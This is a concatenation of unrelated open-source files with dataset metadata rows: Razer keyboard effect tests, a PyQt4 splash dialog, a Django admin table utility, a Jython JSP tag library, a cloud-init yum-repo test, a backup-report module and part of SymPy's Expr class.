device = self.device_manager.devices[0]
device.fx.spectrum()
self.assertEqual(self._bw_chroma.get('mode_spectrum'), '1')
def test_device_keyboard_effect_wave(self):
device = self.device_manager.devices[0]
device.fx.wave(razer.client.constants.WAVE_LEFT)
self.assertEqual(self._bw_chroma.get('mode_wave'), str(razer.client.constants.WAVE_LEFT))
device.fx.wave(razer.client.constants.WAVE_RIGHT)
self.assertEqual(self._bw_chroma.get('mode_wave'), str(razer.client.constants.WAVE_RIGHT))
with self.assertRaises(ValueError):
device.fx.wave('lalala')
def test_device_keyboard_effect_static(self):
device = self.device_manager.devices[0]
device.fx.static(255, 0, 255)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_static', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.static(red, green, blue)
device.fx.static(256, 0, 700)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_static', binary=True))
def test_device_keyboard_effect_reactive(self):
device = self.device_manager.devices[0]
time = razer.client.constants.REACTIVE_500MS
device.fx.reactive(255, 0, 255, time)
self.assertEqual(b'\x01\xFF\x00\xFF', self._bw_chroma.get('mode_reactive', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.reactive(red, green, blue, time)
device.fx.reactive(256, 0, 700, time)
self.assertEqual(b'\x01\xFF\x00\xFF', self._bw_chroma.get('mode_reactive', binary=True))
with self.assertRaises(ValueError):
device.fx.reactive(255, 0, 255, 'lalala')
def test_device_keyboard_effect_breath_single(self):
device = self.device_manager.devices[0]
device.fx.breath_single(255, 0, 255)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_breath', binary=True))
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.breath_single(red, green, blue)
device.fx.breath_single(256, 0, 700)
self.assertEqual(b'\xFF\x00\xFF', self._bw_chroma.get('mode_breath', binary=True))
def test_device_keyboard_effect_breath_dual(self):
device = self.device_manager.devices[0]
device.fx.breath_dual(255, 0, 255, 255, 0, 0)
self.assertEqual(b'\xFF\x00\xFF\xFF\x00\x00', self._bw_chroma.get('mode_breath', binary=True))
for r1, g1, b1, r2, g2, b2 in ((256.0, 0, 0, 0, 0, 0), (0, 256.0, 0, 0, 0, 0), (0, 0, 256.0, 0, 0, 0),
(0, 0, 0, 256.0, 0, 0), (0, 0, 0, 0, 256.0, 0), (0, 0, 0, 0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.breath_dual(r1, g1, b1, r2, g2, b2)
device.fx.breath_dual(256, 0, 700, 255, 0, 0)
self.assertEqual(b'\xFF\x00\xFF\xFF\x00\x00', self._bw_chroma.get('mode_breath', binary=True))
def test_device_keyboard_effect_breath_random(self):
device = self.device_manager.devices[0]
device.fx.breath_random()
self.assertEqual(self._bw_chroma.get('mode_breath'), '1')
def test_device_keyboard_effect_ripple(self):
device = self.device_manager.devices[0]
refresh_rate = 0.01
device.fx.ripple(255, 0, 255, refresh_rate)
time.sleep(0.1)
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertGreater(len(custom_effect_payload), 1)
self.assertEqual(self._bw_chroma.get('mode_custom'), '1')
for red, green, blue in ((256.0, 0, 0), (0, 256.0, 0), (0, 0, 256.0)):
with self.assertRaises(ValueError):
device.fx.reactive(red, green, blue, refresh_rate)
with self.assertRaises(ValueError):
device.fx.reactive(255, 0, 255, 'lalala')
device.fx.none()
def test_device_keyboard_effect_random_ripple(self):
device = self.device_manager.devices[0]
refresh_rate = 0.01
device.fx.ripple_random(refresh_rate)
time.sleep(0.1)
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertGreater(len(custom_effect_payload), 1)
self.assertEqual(self._bw_chroma.get('mode_custom'), '1')
with self.assertRaises(ValueError):
device.fx.ripple_random('lalala')
device.fx.none()
def test_device_keyboard_effect_framebuffer(self):
device = self.device_manager.devices[0]
device.fx.advanced.matrix.set(0, 0, (255, 0, 255))
self.assertEqual(device.fx.advanced.matrix.get(0, 0), (255, 0, 255))
device.fx.advanced.draw()
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertEqual(custom_effect_payload[:4], b'\x00\xFF\x00\xFF')
device.fx.advanced.matrix.to_framebuffer() # Save 255, 0, 255
device.fx.advanced.matrix.reset() # Clear FB
device.fx.advanced.matrix.set(0, 0, (0, 255, 0))
device.fx.advanced.draw_fb_or() # Draw FB or'd with Matrix
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
self.assertEqual(custom_effect_payload[:4], b'\x00\xFF\xFF\xFF')
# Append that to FB
device.fx.advanced.matrix.to_framebuffer_or()
device.fx.advanced.draw()
custom_effect_payload = self._bw_chroma.get('set_key_row', binary=True)
binary = device.fx.advanced.matrix.to_binary()
self.assertEqual(binary, custom_effect_payload)
def test_device_keyboard_macro_enable(self):
device = self.device_manager.devices[0]
device.macro.enable_macros()
self.assertEqual(self._bw_chroma.get('macro_keys'), '1')
def test_device_keyboard_macro_add(self):
device = self.device_manager.devices[0]
url_macro = device.macro.create_url_macro_item('http://example.org')
device.macro.add_macro('M1', [url_macro])
macros = device.macro.get_macros()
self.assertIn('M1', macros)
with self.assertRaises(ValueError):
device.macro.add_macro('M6', url_macro) # Unknown key
with self.assertRaises(ValueError):
device.macro.add_macro('M1', 'lalala') # Not a sequnce
with self.assertRaises(ValueError):
device.macro.add_macro('M1', ['lalala']) # Bad element in sequence
def test_device_keyboard_macro_del(self):
device = self.device_manager.devices[0]
url_macro = device.macro.create_url_macro_item('http://example.org')
device.macro.add_macro('M2', [url_macro])
macros = device.macro.get_macros()
self.assertIn('M2', macros)
device.macro.del_macro('M2')
macros = device.macro.get_macros()
self.assertNotIn('M2', macros)
with self.assertRaises(ValueError):
device.macro.del_macro('M6') # Unknown key | gpl-2.0 | 2,036,554,613,844,915,700 | 34.359281 | 179 | 0.62825 | false |
nesaro/driza | pyrqt/iuqt4/dsplash.py | 1 | 3768 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#Copyright (C) 2006-2008 Néstor Arocha Rodríguez
#This file is part of pyrqt.
#
#pyrqt is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#pyrqt is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with pyrqt; if not, write to the Free Software
#Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Dialogo splash que precede a la ventana principal"""
#textBrowser1: La ventana con las opciones
#pixmapLabel1: La fotografia
from PyQt4 import QtCore,QtGui
from pyrqt.iuqt4.ui.dsplash import Ui_DialogoSplash
from PyQt4.QtGui import QMessageBox
import logging
log = logging.getLogger("__name__")
class DSplash(QtGui.QDialog):
"""Dialogo que muestra un acceso rápido a las acciones que puede realizar el usuario"""
def __init__(self, parent, gestortemas, config, vsalida):
QtGui.QDialog.__init__(self, parent)
#VARIABLES PRIVADAS
self.ui=Ui_DialogoSplash()
self.ui.setupUi(self)
self.__textohtml = ""
self.__config = config
self.__vsalida = vsalida
self.ui.label.setPixmap(gestortemas.portada())
self.__conexiones()
self.__inithtml()
self.ui.textBrowser.append(self.__textohtml)
#FUNCIONES PRIVADAS
def __conexiones(self):
"""Bloque de conexiones"""
from PyQt4.QtCore import SIGNAL
#self.connect(self.ui.textBrowser,SIGNAL("sourceChanged(const QUrl & )"),self.__enlace)
self.connect(self.ui.textBrowser,SIGNAL("anchorClicked(const QUrl & )"),self.__enlace)
def __inithtml(self):
"""Devuelve el html que muestra la ventana"""
self.__textohtml="<table> \\ <tr><td><a href=\"nuevo\">Nuevo Proyecto</a></td></tr> <tr> <td><a href=\"abrir\">Abrir Proyecto</a></td></tr><tr><td><hr></td></tr>"
for i in range(len(self.__config.configuracion["lfichero"])):
try:
nfichero=self.__config.configuracion["lfichero"][i]
ristra="<tr><td><a href=\"%d\">%s</a></td></tr>" % (i,nfichero)
self.__textohtml+=ristra
except:
i=4
self.__textohtml+="<tr><td><hr></td></tr><tr><td><a href=\"salida\">Dialogo de salida</a></td></tr></table>"
def __enlace(self, parametro):
"""Define las acciones que realizará el programa tras pulsar en un enlace"""
log.debug("Pulsado enlace"+parametro.toString())
parametro = parametro.toString()
self.ui.textBrowser.setSource(QtCore.QUrl(""))
if parametro == "nuevo":
self.accept()
elif parametro == "abrir":
if self.parent().abrir_proyecto(self):
self.accept()
elif parametro == "0" or parametro == "1" or \
parametro=="2" or parametro=="3" or \
parametro=="4":
if self.parent().abrir_proyecto(self, self.__config.configuracion["lfichero"][eval(str(parametro))]):
self.accept()
elif parametro == "salida":
self.parent().hide()
self.__vsalida.show()
self.accept()
else:
self.reject()
return
def __errormsg(self,msg=None):
if not msg:
msg="Generado error"
QMessageBox.critical(self,u'Error!', msg)
| gpl-2.0 | 991,958,256,241,659,000 | 36.64 | 170 | 0.619022 | false |
taedori81/shoop | shoop/admin/utils/picotable.py | 1 | 13367 | # -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
import json
import six
from django.core.paginator import EmptyPage, Paginator
from django.db.models import Count, Manager, Q, QuerySet
from django.http.response import JsonResponse
from django.template.defaultfilters import yesno
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from shoop.admin.utils.urls import get_model_url, NoModelUrl
from shoop.utils.dates import try_parse_date
from shoop.utils.objects import compact
from shoop.utils.serialization import ExtendedJSONEncoder
def maybe_callable(thing, context=None):
"""
If `thing` is callable, return it.
If `thing` names a callable attribute of `context`, return it.
"""
if callable(thing):
return thing
if isinstance(thing, six.string_types):
thing = getattr(context, thing, None)
if callable(thing):
return thing
return None
def maybe_call(thing, context, args=None, kwargs=None):
"""
If `thing` is callable, call it with args and kwargs and return the value.
If `thing` names a callable attribute of `context`, call it with args and kwargs and return the value.
Otherwise return `thing`.
"""
func = maybe_callable(context=context, thing=thing)
if func:
thing = func(*(args or ()), **(kwargs or {}))
return thing
class Filter(object):
type = None
def to_json(self, context):
return None
def filter_queryset(self, queryset, column, value):
return queryset # pragma: no cover
class ChoicesFilter(Filter):
type = "choices"
def __init__(self, choices=None, filter_field=None):
self.filter_field = filter_field
self.choices = choices
def _flatten_choices(self, context):
if not self.choices:
return None
choices = maybe_call(self.choices, context=context)
if isinstance(choices, QuerySet):
choices = [(c.pk, c) for c in choices]
return [(None, "")] + [
(force_text(value, strings_only=True), force_text(display))
for (value, display)
in choices
]
def to_json(self, context):
return {
"choices": self._flatten_choices(context)
}
def filter_queryset(self, queryset, column, value):
return queryset.filter(**{(self.filter_field or column.id): value})
class RangeFilter(Filter):
type = "range"
def __init__(self, min=None, max=None, step=None, field_type=None, filter_field=None):
"""
:param filter_field: Filter field (Django query expression). If None, column ID is used.
:type filter_field: str|None
:param min: Minimum value.
:param max: Maximum value.
:param step: Step value. See the HTML5 documentation for semantics.
:param field_type: Field type string. See the HTML5 documentation for semantics.
:type field_type: str|None
"""
self.filter_field = filter_field
self.min = min
self.max = max
self.step = step
self.field_type = field_type
def to_json(self, context):
return {
"range": compact({
"min": maybe_call(self.min, context=context),
"max": maybe_call(self.max, context=context),
"step": maybe_call(self.step, context=context),
"type": self.field_type,
})
}
def filter_queryset(self, queryset, column, value):
if value:
min = value.get("min")
max = value.get("max")
q = {}
filter_field = (self.filter_field or column.id)
if min is not None:
q["%s__gte" % filter_field] = min
if max is not None:
q["%s__lte" % filter_field] = max
if q:
queryset = queryset.filter(**q)
return queryset
class DateRangeFilter(RangeFilter):
def __init__(self, *args, **kwargs):
super(DateRangeFilter, self).__init__(*args, **kwargs)
if not self.field_type:
self.field_type = "date"
def filter_queryset(self, queryset, column, value):
if value:
value = {
"min": try_parse_date(value.get("min")),
"max": try_parse_date(value.get("max")),
}
return super(DateRangeFilter, self).filter_queryset(queryset, column, value)
class TextFilter(Filter):
type = "text"
def __init__(self, field_type=None, placeholder=None, operator="icontains", filter_field=None):
"""
:param filter_field: Filter field (Django query expression). If None, column ID is used.
:type filter_field: str|None
:param field_type: Field type string. See the HTML5 documentation for semantics.
:type field_type: str|None
:param placeholder: Field placeholder string.
:type placeholder: str|None
:param operator: Django operator for the queryset.
:type operator: str
"""
self.filter_field = filter_field
self.field_type = field_type
self.placeholder = placeholder
self.operator = operator
def to_json(self, context):
return {
"text": compact({
"type": self.field_type,
"placeholder": force_text(self.placeholder) if self.placeholder else None,
})
}
def filter_queryset(self, queryset, column, value):
if value:
value = force_text(value).strip()
if value:
return queryset.filter(**{"%s__%s" % ((self.filter_field or column.id), self.operator): value})
return queryset
class MultiFieldTextFilter(TextFilter):
def __init__(self, filter_fields, **kwargs):
"""
:param filter_field: List of Filter fields (Django query expression).
:type filter_field: list<str>
:param kwargs: Kwargs for `TextFilter`.
"""
super(MultiFieldTextFilter, self).__init__(**kwargs)
self.filter_fields = tuple(filter_fields)
def filter_queryset(self, queryset, column, value):
if value:
q = Q()
for filter_field in self.filter_fields:
q |= Q(**{"%s__%s" % (filter_field, self.operator): value})
return queryset.filter(q)
return queryset
true_or_false_filter = ChoicesFilter([
(False, _("no")),
(True, _("yes"))
])
class Column(object):
def __init__(self, id, title, **kwargs):
self.id = id
self.title = title
self.sort_field = kwargs.pop("sort_field", id)
self.display = kwargs.pop("display", id)
self.class_name = kwargs.pop("class_name", None)
self.filter_config = kwargs.pop("filter_config", None)
self.sortable = bool(kwargs.pop("sortable", True))
self.linked = bool(kwargs.pop("linked", True))
if kwargs and type(self) is Column: # If we're not derived, validate that client code doesn't fail
raise NameError("Unexpected kwarg(s): %s" % kwargs.keys())
def to_json(self, context=None):
out = {
"id": force_text(self.id),
"title": force_text(self.title),
"className": force_text(self.class_name) if self.class_name else None,
"filter": self.filter_config.to_json(context=context) if self.filter_config else None,
"sortable": bool(self.sortable),
"linked": bool(self.linked),
}
return dict((key, value) for (key, value) in six.iteritems(out) if value is not None)
def sort_queryset(self, queryset, desc=False):
order_by = ("-" if desc else "") + self.sort_field
queryset = queryset.order_by(order_by)
if self.sort_field.startswith("translations__"):
# Ref http://archlinux.me/dusty/2010/12/07/django-dont-use-distinct-and-order_by-across-relations/
queryset = queryset.annotate(_dummy_=Count(self.sort_field))
return queryset
def filter_queryset(self, queryset, value):
if self.filter_config:
queryset = self.filter_config.filter_queryset(queryset, self, value)
return queryset
def get_display_value(self, context, object):
display_callable = maybe_callable(self.display, context=context)
if display_callable:
return display_callable(object)
value = object
for bit in self.display.split("__"):
value = getattr(value, bit, None)
if isinstance(value, bool):
value = yesno(value)
if isinstance(value, Manager):
value = ", ".join("%s" % x for x in value.all())
return force_text(value)
class Picotable(object):
def __init__(self, request, columns, queryset, context):
self.request = request
self.columns = columns
self.queryset = queryset
self.context = context
self.columns_by_id = dict((c.id, c) for c in self.columns)
self.get_object_url = maybe_callable("get_object_url", context=self.context)
self.get_object_abstract = maybe_callable("get_object_abstract", context=self.context)
def process_queryset(self, query):
queryset = self.queryset
filters = (query.get("filters") or {})
for column, value in six.iteritems(filters):
column = self.columns_by_id.get(column)
if column:
queryset = column.filter_queryset(queryset, value)
sort = query.get("sort")
if sort:
desc = (sort[0] == "-")
column = self.columns_by_id.get(sort[1:])
if not (column and column.sortable):
raise ValueError("Can't sort by column %r" % sort[1:])
queryset = column.sort_queryset(queryset, desc=desc)
return queryset
def get_data(self, query):
paginator = Paginator(self.process_queryset(query), query["perPage"])
try:
page = paginator.page(int(query["page"]))
except EmptyPage:
page = paginator.page(paginator.num_pages)
out = {
"columns": [c.to_json(context=self.context) for c in self.columns],
"pagination": {
"perPage": paginator.per_page,
"nPages": paginator.num_pages,
"nItems": paginator.count,
"pageNum": page.number,
},
"items": [self.process_item(item) for item in page],
"itemInfo": _("Showing %(per_page)s of %(n_items)s %(verbose_name_plural)s") % {
"per_page": min(paginator.per_page, paginator.count),
"n_items": paginator.count,
"verbose_name_plural": self.get_verbose_name_plural(),
}
}
return out
def process_item(self, object):
out = {
"_id": object.id,
"_url": (self.get_object_url(object) if callable(self.get_object_url) else None),
}
for column in self.columns:
out[column.id] = column.get_display_value(context=self.context, object=object)
out["_abstract"] = (self.get_object_abstract(object, item=out) if callable(self.get_object_abstract) else None)
return out
def get_verbose_name_plural(self):
try:
return self.queryset.model._meta.verbose_name_plural
except AttributeError:
return _("objects")
class PicotableViewMixin(object):
columns = []
picotable_class = Picotable
template_name = "shoop/admin/base_picotable.jinja"
def process_picotable(self, query_json):
pico = self.picotable_class(
request=self.request,
columns=self.columns,
queryset=self.get_queryset(),
context=self
)
return JsonResponse(pico.get_data(json.loads(query_json)), encoder=ExtendedJSONEncoder)
def get(self, request, *args, **kwargs):
query = request.GET.get("jq")
if query:
return self.process_picotable(query)
return super(PicotableViewMixin, self).get(request, *args, **kwargs)
def get_object_url(self, instance):
try:
return get_model_url(instance)
except NoModelUrl:
pass
return None
def get_object_abstract(self, instance, item):
"""
Get the object abstract lines (used for mobile layouts) for this object.
Supported keys in abstract line dicts are:
* text (required)
* title
* class (CSS class name -- `header` for instance)
* raw (boolean; whether or not the `text` is raw HTML)
:param instance: The instance
:param item: The item dict so far. Useful for reusing precalculated values.
:return: Iterable of dicts to pass through to the picotable javascript
:rtype: Iterable[dict]
"""
return None
def get_filter(self):
filter_string = self.request.GET.get("filter")
return json.loads(filter_string) if filter_string else {}
| agpl-3.0 | 7,626,388,386,203,150,000 | 33.992147 | 119 | 0.597292 | false |
ActiveState/code | recipes/Python/252132_generic_jythtaglib/recipe-252132.py | 1 | 3673 | ## store this into classes/jython/get.java
package jython;
import javax.servlet.jsp.*;
import javax.servlet.jsp.tagext.*;
import org.python.util.PythonInterpreter;
import org.python.core.*;
public class get extends TagSupport{
public PythonInterpreter interp;
public String cmd;
protected PageContext pageContext;
public get(){super();}
public void setVar(String cmd){this.cmd=cmd;}
public void setPageContext(PageContext pageContext) {
this.pageContext = pageContext;
}
public int doEndTag() throws javax.servlet.jsp.JspTagException{
try{
if(pageContext.getAttribute("jythonInterp")==null){
interp = new PythonInterpreter();
pageContext.setAttribute("jythonInterp",interp,PageContext.PAGE_SCOPE);
} else {
interp=(PythonInterpreter)pageContext.getAttribute("jythonInterp");
}
String res=interp.eval(cmd).toString();
pageContext.getOut().write(res);
}catch(java.io.IOException e){
throw new JspTagException("IO Error: " + e.getMessage());
}
return EVAL_PAGE;
}
}
## store this into classes/jython/exec.java
package jython;
import javax.servlet.jsp.*;
import javax.servlet.jsp.tagext.*;
import org.python.util.PythonInterpreter;
public class exec extends BodyTagSupport{
public PythonInterpreter interp;
public void setParent(Tag parent) {
this.parent = parent;
}
public void setBodyContent(BodyContent bodyOut) {
this.bodyOut = bodyOut;
}
public void setPageContext(PageContext pageContext) {
this.pageContext = pageContext;
}
public Tag getParent() {
return this.parent;
}
public int doStartTag() throws JspException {
return EVAL_BODY_TAG;
}
public int doEndTag() throws JspException {
return EVAL_PAGE;
}
// Default implementations for BodyTag methods as well
// just in case a tag decides to implement BodyTag.
public void doInitBody() throws JspException {
}
public int doAfterBody() throws JspException {
String cmd = bodyOut.getString();
if(pageContext.getAttribute("jythonInterp")==null){
interp = new PythonInterpreter();
interp.set("pageContext",pageContext);
pageContext.setAttribute("jythonInterp",interp,PageContext.PAGE_SCOPE);
} else {
interp=(PythonInterpreter)pageContext.getAttribute("jythonInterp");
}
interp.exec(cmd);
return SKIP_BODY;
}
public void release() {
bodyOut = null;
pageContext = null;
parent = null;
}
protected BodyContent bodyOut;
protected PageContext pageContext;
protected Tag parent;
}
## store this into jsp/jython.tld
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE taglib PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.1//EN" "http://java.sun.com/j2ee/dtds/web-jsptaglibrary_1_1.dtd">
<taglib>
<tlibversion>1.0</tlibversion>
<jspversion>1.1</jspversion>
<shortname>jython</shortname>
<info>
A simple Jython tag library
</info>
<tag>
<name>exec</name>
<tagclass>jython.exec</tagclass>
</tag>
<tag>
<name>get</name>
<tagclass>jython.get</tagclass>
<bodycontent>empty</bodycontent>
<attribute>
<name>var</name>
<required>true</required>
</attribute>
</tag>
</taglib>
## add this to the web.xml file
<taglib>
<taglib-uri>http://www.jython.org</taglib-uri>
<taglib-location>/WEB-INF/jsp/jython.tld</taglib-location>
</taglib>
| mit | -4,884,085,414,985,294,000 | 25.615942 | 139 | 0.643616 | false |
cbuben/cloud-init | tests/unittests/test_handler/test_handler_yum_add_repo.py | 1 | 2372 | from cloudinit import util
from cloudinit.config import cc_yum_add_repo
from .. import helpers
import logging
from StringIO import StringIO
import configobj
LOG = logging.getLogger(__name__)
class TestConfig(helpers.FilesystemMockingTestCase):
def setUp(self):
super(TestConfig, self).setUp()
self.tmp = self.makeDir(prefix="unittest_")
def test_bad_config(self):
cfg = {
'yum_repos': {
'epel-testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
# Missing this should cause the repo not to be written
# 'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'enabled': False,
'gpgcheck': True,
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'failovermethod': 'priority',
},
},
}
self.patchUtils(self.tmp)
cc_yum_add_repo.handle('yum_add_repo', cfg, None, LOG, [])
self.assertRaises(IOError, util.load_file,
"/etc/yum.repos.d/epel_testing.repo")
def test_write_config(self):
cfg = {
'yum_repos': {
'epel-testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'enabled': False,
'gpgcheck': True,
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'failovermethod': 'priority',
},
},
}
self.patchUtils(self.tmp)
cc_yum_add_repo.handle('yum_add_repo', cfg, None, LOG, [])
contents = util.load_file("/etc/yum.repos.d/epel_testing.repo")
contents = configobj.ConfigObj(StringIO(contents))
expected = {
'epel_testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
'failovermethod': 'priority',
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'enabled': '0',
'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'gpgcheck': '1',
}
}
self.assertEquals(expected, dict(contents))
| gpl-3.0 | -351,846,011,476,720,400 | 34.402985 | 80 | 0.510118 | false |
elifesciences/ubr | ubr/report.py | 1 | 5341 | import re
from datetime import datetime
import logging
from ubr.utils import group_by_many, visit
from ubr import conf, s3
from ubr.descriptions import load_descriptor, find_descriptors, pname
LOG = logging.getLogger(__name__)
def bucket_contents(bucket):
"returns a list of all keys in the given bucket"
paginator = s3.s3_conn().get_paginator("list_objects")
iterator = paginator.paginate(**{"Bucket": bucket, "Prefix": ""})
results = []
for page in iterator:
results.extend([i["Key"] for i in page["Contents"]])
return results
def parse_prefix_list(prefix_list):
"splits a bucket prefix-path into a map of data"
splitter = r"(?P<project>.+)\/(?P<ym>\d+)\/(?P<ymd>\d+)_(?P<host>[a-z0-9\.\-]+)_(?P<hms>\d+)\-(?P<filename>.+)$"
splitter = re.compile(splitter)
results = []
for row in prefix_list:
try:
results.append(splitter.match(row).groupdict())
except AttributeError:
# failed to parse row. these are in all cases very old or adhoc files and can be safely ignored
continue
return results
def filter_backup_list(backup_list):
"filters the given list of backups, excluding 'hidden' backups, non-production backups and projects/files that are on a blacklist configured in conf.py"
project_blacklist = conf.REPORT_PROJECT_BLACKLIST
file_blacklist = conf.REPORT_FILE_BLACKLIST
# we want to target only working machines and ignore test/retired/etc projects
def cond(backup):
return (
not backup["project"].startswith("_")
and any([substr in backup["host"] for substr in ["prod", "master-server"]])
and backup["project"] not in project_blacklist
and backup["filename"] not in file_blacklist
)
return filter(cond, backup_list)
def all_projects_latest_backups_by_host_and_filename(bucket):
"returns a nested map of the most recent backup for each project+host+filename"
# this function by itself is really insightful.
# perhaps have it accept a list of backups rather than creating one itself?
prefix_list = bucket_contents(bucket)
backup_list = parse_prefix_list(prefix_list)
backup_list = filter_backup_list(backup_list)
# we want a list of the backups for each of the targets
# {project: {host: {filename: [item-list]}}}
backup_list = group_by_many(backup_list, ["project", "host", "filename"])
# we want to transform the deeply nested struct above to retain only the most recent
# backup. the leaves are sorted lists in ascending order, least to most recent
def apply_to_backup(x):
return isinstance(x, list)
def most_recent_backup(lst):
return lst[-1]
# {project: {host: {filename: latest-item}}}
return visit(backup_list, apply_to_backup, most_recent_backup)
def dtobj_from_backup(backup):
"given a backup struct, returns a datetime object"
dtstr = backup["ymd"] + backup["hms"]
return datetime.strptime(dtstr, "%Y%m%d%H%M%S")
def old_backup(backup):
"predicate, returns true if given backup is 'old' (older than 2 days)"
dtobj = dtobj_from_backup(backup)
diff = datetime.now() - dtobj
threshold = conf.REPORT_PROBLEM_THRESHOLD
return diff.days > threshold
#
def print_report(backup_list):
"given a list of backups, prints it's details"
result = group_by_many(backup_list, ["project", "host", "filename"])
for project, hosts in result.items():
print(project)
for host, files in hosts.items():
print(" ", host)
for filename, backup in files.items():
backup = backup[0] # why is this a list ... ?
ppdt = dtobj_from_backup(backup)
print(" %s: %s" % (filename, ppdt))
def check_all():
"check all project that backups are happening"
results = all_projects_latest_backups_by_host_and_filename(conf.BUCKET)
problems = []
for project, hosts in results.items():
for host, files in hosts.items():
for filename, backup in files.items():
old_backup(backup) and problems.append(backup)
# problems.append(backup)
if problems:
print_report(problems)
return problems
def check(hostname, path_list=None):
"check self that backups are happening"
problems = []
for descriptor_path in find_descriptors(conf.DESCRIPTOR_DIR):
# 'lax'
project = pname(descriptor_path)
# {'postgresql-database': ['lax']}
descriptor = load_descriptor(descriptor_path, path_list)
for target, remote_path_list in descriptor.items():
# [('laxprod-psql.gz', 'lax/201908/20190825_prod--lax.elifesciences.org_230337-laxprod-psql.gz')
# ('laxprod-archive.tar.gz', ' 'lax/201908/20190825_prod--lax.elifesciences.org_230337-laxprod-psql.gz')]
latest_for_target = s3.latest_backups(
conf.BUCKET, project, hostname, target
)
path_list = [s3_path for fname, s3_path in latest_for_target]
backup_list = parse_prefix_list(path_list)
for backup in backup_list:
old_backup(backup) and problems.append(backup)
# problems.append(backup)
problems and print_report(problems)
return problems
| gpl-3.0 | 7,652,267,443,760,472,000 | 37.15 | 156 | 0.646508 | false |
Curious72/sympy | sympy/core/expr.py | 1 | 113033 | from __future__ import print_function, division
from .sympify import sympify, _sympify, SympifyError
from .basic import Basic, Atom
from .singleton import S
from .evalf import EvalfMixin, pure_complex
from .decorators import _sympifyit, call_highest_priority
from .cache import cacheit
from .compatibility import reduce, as_int, default_sort_key, range
from mpmath.libmp import mpf_log, prec_to_dps
from collections import defaultdict
class Expr(Basic, EvalfMixin):
"""
Base class for algebraic expressions.
Everything that requires arithmetic operations to be defined
should subclass this class, instead of Basic (which should be
used only for argument storage and expression manipulation, i.e.
pattern matching, substitutions, etc).
See Also
========
sympy.core.basic.Basic
"""
__slots__ = []
@property
def _diff_wrt(self):
"""Is it allowed to take derivative wrt to this instance.
This determines if it is allowed to take derivatives wrt this object.
Subclasses such as Symbol, Function and Derivative should return True
to enable derivatives wrt them. The implementation in Derivative
separates the Symbol and non-Symbol _diff_wrt=True variables and
temporarily converts the non-Symbol vars in Symbols when performing
the differentiation.
Note, see the docstring of Derivative for how this should work
mathematically. In particular, note that expr.subs(yourclass, Symbol)
should be well-defined on a structural level, or this will lead to
inconsistent results.
Examples
========
>>> from sympy import Expr
>>> e = Expr()
>>> e._diff_wrt
False
>>> class MyClass(Expr):
... _diff_wrt = True
...
>>> (2*MyClass()).diff(MyClass())
2
"""
return False
@cacheit
def sort_key(self, order=None):
coeff, expr = self.as_coeff_Mul()
if expr.is_Pow:
expr, exp = expr.args
else:
expr, exp = expr, S.One
if expr.is_Dummy:
args = (expr.sort_key(),)
elif expr.is_Atom:
args = (str(expr),)
else:
if expr.is_Add:
args = expr.as_ordered_terms(order=order)
elif expr.is_Mul:
args = expr.as_ordered_factors(order=order)
else:
args = expr.args
args = tuple(
[ default_sort_key(arg, order=order) for arg in args ])
args = (len(args), tuple(args))
exp = exp.sort_key(order=order)
return expr.class_key(), args, exp, coeff
# ***************
# * Arithmetics *
# ***************
# Expr and its sublcasses use _op_priority to determine which object
# passed to a binary special method (__mul__, etc.) will handle the
# operation. In general, the 'call_highest_priority' decorator will choose
# the object with the highest _op_priority to handle the call.
# Custom subclasses that want to define their own binary special methods
# should set an _op_priority value that is higher than the default.
#
# **NOTE**:
# This is a temporary fix, and will eventually be replaced with
# something better and more powerful. See issue 5510.
_op_priority = 10.0
def __pos__(self):
return self
def __neg__(self):
return Mul(S.NegativeOne, self)
def __abs__(self):
from sympy import Abs
return Abs(self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__radd__')
def __add__(self, other):
return Add(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__add__')
def __radd__(self, other):
return Add(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rsub__')
def __sub__(self, other):
return Add(self, -other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__sub__')
def __rsub__(self, other):
return Add(other, -self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rmul__')
def __mul__(self, other):
return Mul(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__mul__')
